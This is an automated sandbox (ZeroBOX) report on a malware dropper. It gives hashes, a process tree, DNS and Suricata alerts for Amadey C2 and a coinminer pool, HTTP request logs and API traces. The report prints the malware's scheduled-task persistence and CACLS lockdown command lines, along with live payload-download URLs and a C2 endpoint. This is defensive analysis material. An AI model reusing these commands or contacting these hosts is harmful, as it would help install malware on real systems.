Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 16, 2023, 10:55 a.m.	Oct. 16, 2023, 11:07 a.m.

Size	10.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`d334fdbe7080a9e36d94001903199491`
SHA256	`20f0619336fb27994a740fb37794d83d027646bbf0d826d8b3542f042412a908`
CRC32	`7D81ACC3`
ssdeep	`192:4ctzdkaK/n7bEbIn+qeDFcugX8P6J8stYcFwVc03KY:4y+p7bEbIn+rgX8yJptYcFwVc03K`
Yara	UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature IsPE32 - (no description) Is_DotNET_EXE - (no description)

RBY2.exe "C:\Users\test22\AppData\Local\Temp\RBY2.exe"
2564
- BUjW8Z15kUVOZ9tRIOoW9DKz.exe "C:\Users\test22\Pictures\BUjW8Z15kUVOZ9tRIOoW9DKz.exe"
  2544
- j9BhD7GZkN6ZLJkG3SQci0cK.exe "C:\Users\test22\Pictures\j9BhD7GZkN6ZLJkG3SQci0cK.exe"
  2504
- VU7axjpmxW3xOeUWMCQ7F4ix.exe "C:\Users\test22\Pictures\VU7axjpmxW3xOeUWMCQ7F4ix.exe"
  2500
  - nhdues.exe "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe"
    1576
    - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
      1108
    - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
      1736
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2992
      - cacls.exe CACLS "nhdues.exe" /P "test22:N"
        1352
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        108
      - cacls.exe CACLS "..\1ff8bec27e" /P "test22:N"
        1868
      - cacls.exe CACLS "..\1ff8bec27e" /P "test22:R" /E
        2180
- vREToto7AIJ9nFpi93ZHsPlH.exe "C:\Users\test22\Pictures\vREToto7AIJ9nFpi93ZHsPlH.exe" --silent --allusers=0
  2552
- zhmN7sLxTTABITlz75PYuip7.exe "C:\Users\test22\Pictures\zhmN7sLxTTABITlz75PYuip7.exe"
  2636
- JasR85FkoNzdmfzKQ2DYJf5k.exe "C:\Users\test22\Pictures\JasR85FkoNzdmfzKQ2DYJf5k.exe"
  2744

Name	Response	Post-Analysis Lookup
flyawayaero.net	A 104.21.93.225 A 172.67.216.81	172.67.216.81
pastebin.com	A 104.20.67.143 A 172.67.34.170 A 104.20.68.143	172.67.34.170
logicmouse.net	A 104.21.1.34 A 172.67.186.120	104.21.1.34
yip.su	A 148.251.234.93	148.251.234.93
apps.identrust.com	A 121.254.136.9 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.18	23.67.53.17
martvl.com	A 69.48.143.183	69.48.143.183
laubenstein.space	A 45.130.41.101	45.130.41.101
pool.hashvault.pro	A 131.153.76.130 A 125.253.92.50	125.253.92.50
guboh2p.top	A 185.154.192.128	185.154.192.128
lycheepanel.info	A 104.21.32.208 A 172.67.187.122	104.21.32.208
thegrandduck.org	A 104.21.79.27 A 172.67.140.235	104.21.79.27
net.geo.opera.com	A 107.167.110.211 A 107.167.110.216 CNAME lati.lb.opera.technology CNAME us.net.opera.com	107.167.110.216
potatogoose.com	A 104.21.35.235 A 172.67.180.173	172.67.180.173

IP Address	Status	Action
104.20.68.143	Active	Moloch
104.21.35.235	Active	Moloch
104.21.79.27	Active	Moloch
104.21.93.225	Active	Moloch
107.167.110.211	Active	Moloch
121.254.136.9	Active	Moloch
131.153.76.130	Active	Moloch
148.251.234.93	Active	Moloch
164.124.101.2	Active	Moloch
172.67.186.120	Active	Moloch
172.67.187.122	Active	Moloch
185.154.192.128	Active	Moloch
193.42.32.29	Active	Moloch
45.130.41.101	Active	Moloch
69.48.143.183	Active	Moloch
85.217.144.143	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49162 -> 104.20.68.143:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49164 -> 172.67.187.122:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 104.21.93.225:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 69.48.143.183:443 -> 192.168.56.101:49169	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49169 -> 69.48.143.183:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:54883 -> 164.124.101.2:53	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	Potentially Bad Traffic
TCP 192.168.56.101:49167 -> 172.67.186.120:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 148.251.234.93:443 -> 192.168.56.101:49170	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49170 -> 148.251.234.93:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49165 -> 85.217.144.143:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 85.217.144.143:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.101:49168 -> 45.130.41.101:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 85.217.144.143:80 -> 192.168.56.101:49165	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.101:49175 -> 104.21.79.27:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 85.217.144.143:80 -> 192.168.56.101:49165	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 85.217.144.143:80 -> 192.168.56.101:49165	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.101:49165	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49171 -> 85.217.144.143:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49174 -> 107.167.110.211:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49172 -> 104.21.35.235:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 85.217.144.143:80 -> 192.168.56.101:49171	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 85.217.144.143:80 -> 192.168.56.101:49171	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.101:49171	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
UDP 192.168.56.101:51901 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.154.192.128:80	2022896	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016	A Network Trojan was detected
TCP 192.168.56.101:49177 -> 185.154.192.128:80	2023882	ET INFO HTTP Request to a *.top domain	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.154.192.128:80	2031089	ET HUNTING Request to .TOP Domain with Minimal Headers	Potentially Bad Traffic
TCP 185.154.192.128:80 -> 192.168.56.101:49177	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
UDP 192.168.56.101:57986 -> 164.124.101.2:53	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	Crypto Currency Mining Activity Detected
TCP 185.154.192.128:80 -> 192.168.56.101:49177	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.154.192.128:80 -> 192.168.56.101:49177	2023464	ET HUNTING Possible EXE Download From Suspicious TLD	Misc activity
TCP 192.168.56.101:49190 -> 193.42.32.29:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.101:49190 -> 193.42.32.29:80	2045751	ET MALWARE Win32/Amadey Bot Activity (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49192 -> 193.42.32.29:80	2044597	ET MALWARE Amadey Bot Activity (POST) M1	A Network Trojan was detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.101:49162 104.20.68.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	55:c8:82:61:30:05:42:80:db:47:5e:d0:66:b5:df:ac:14:5b:19:6f
TLS 1.2 192.168.56.101:49164 172.67.187.122:443	C=US, O=Let's Encrypt, CN=E1	CN=lycheepanel.info	9f:29:fd:d3:0f:46:b4:fc:1f:d0:06:c7:4e:4d:21:d0:21:08:ea:43
TLS 1.2 192.168.56.101:49166 104.21.93.225:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=flyawayaero.net	34:8b:a3:9d:94:c4:8d:02:5c:e1:f1:43:da:57:49:64:a9:1c:b6:fe
TLS 1.2 192.168.56.101:49167 172.67.186.120:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=logicmouse.net	ad:0f:20:8c:93:a2:c4:29:8c:5a:74:17:2b:40:4b:ee:07:0c:c8:e0
TLS 1.2 192.168.56.101:49168 45.130.41.101:443	C=US, O=Let's Encrypt, CN=R3	CN=laubenstein.space	d4:04:82:56:eb:8d:bb:fd:72:7a:36:fd:90:c1:07:aa:45:ac:92:27
TLS 1.2 192.168.56.101:49175 104.21.79.27:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=thegrandduck.org	88:18:17:49:0e:b0:fa:c0:a6:7b:3d:0e:36:55:3a:59:1b:5f:1e:57
TLS 1.2 192.168.56.101:49174 107.167.110.211:443	C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1	C=NO, ST=Oslo, L=Oslo, O=Opera Norway AS, CN=net.geo.opera.com	8b:1e:84:38:9c:97:8c:be:f7:e1:0e:28:14:15:bb:08:cc:fb:ad:af
TLS 1.2 192.168.56.101:49172 104.21.35.235:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=potatogoose.com	0f:a9:ea:9d:3e:af:d2:24:68:a0:8f:b7:58:00:c9:0b:f0:7f:31:37
TLS 1.3 192.168.56.101:49199 131.153.76.130:80	None	None	None

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Oct. 16, 2023, 10:57 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 16, 2023, 10:48 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 10:48 a.m.			0	0

Command line console output was observed (50 out of 65 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 16, 2023, 10:57 a.m.	buffer: SUCCESS: The scheduled task "nhdues.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Oct. 16, 2023, 10:57 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 10:57 a.m.	buffer: i console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 16, 2023, 10:48 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (10 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://85.217.144.143/files/My2.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://85.217.144.143/files/Amadey.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
suspicious_features	GET method with no useragent header	suspicious_request	GET http://guboh2p.top/build.exe
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://193.42.32.29/9bDc8sQ/index.php
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://193.42.32.29/9bDc8sQ/index.php?scr=1
suspicious_features	GET method with no useragent header	suspicious_request	GET https://pastebin.com/raw/V6VJsrV3
suspicious_features	GET method with no useragent header	suspicious_request	GET https://flyawayaero.net/baf14778c246e15550645e30ba78ce1c.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://logicmouse.net/6779d89b7a368f4f3f340b50a9d18d71.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767

Performs some HTTP requests (11 events)

request	GET http://85.217.144.143/files/My2.exe
request	GET http://85.217.144.143/files/Amadey.exe
request	GET http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET http://guboh2p.top/build.exe
request	POST http://193.42.32.29/9bDc8sQ/index.php
request	POST http://193.42.32.29/9bDc8sQ/index.php?scr=1
request	GET https://pastebin.com/raw/V6VJsrV3
request	GET https://flyawayaero.net/baf14778c246e15550645e30ba78ce1c.exe
request	GET https://logicmouse.net/6779d89b7a368f4f3f340b50a9d18d71.exe
request	GET https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767

Sends data using the HTTP POST Method (2 events)

request	POST http://193.42.32.29/9bDc8sQ/index.php
request	POST http://193.42.32.29/9bDc8sQ/index.php?scr=1

Resolves a suspicious Top Level Domain (TLD) (2 events)

domain	yip.su				description	Soviet Union domain TLD
domain	guboh2p.top				description	Generic top level domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 63 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000007c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000920000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a31000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40cb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000009a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a34000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a34000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a34000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a34000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9428a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9433c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94366000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94340000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9429c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
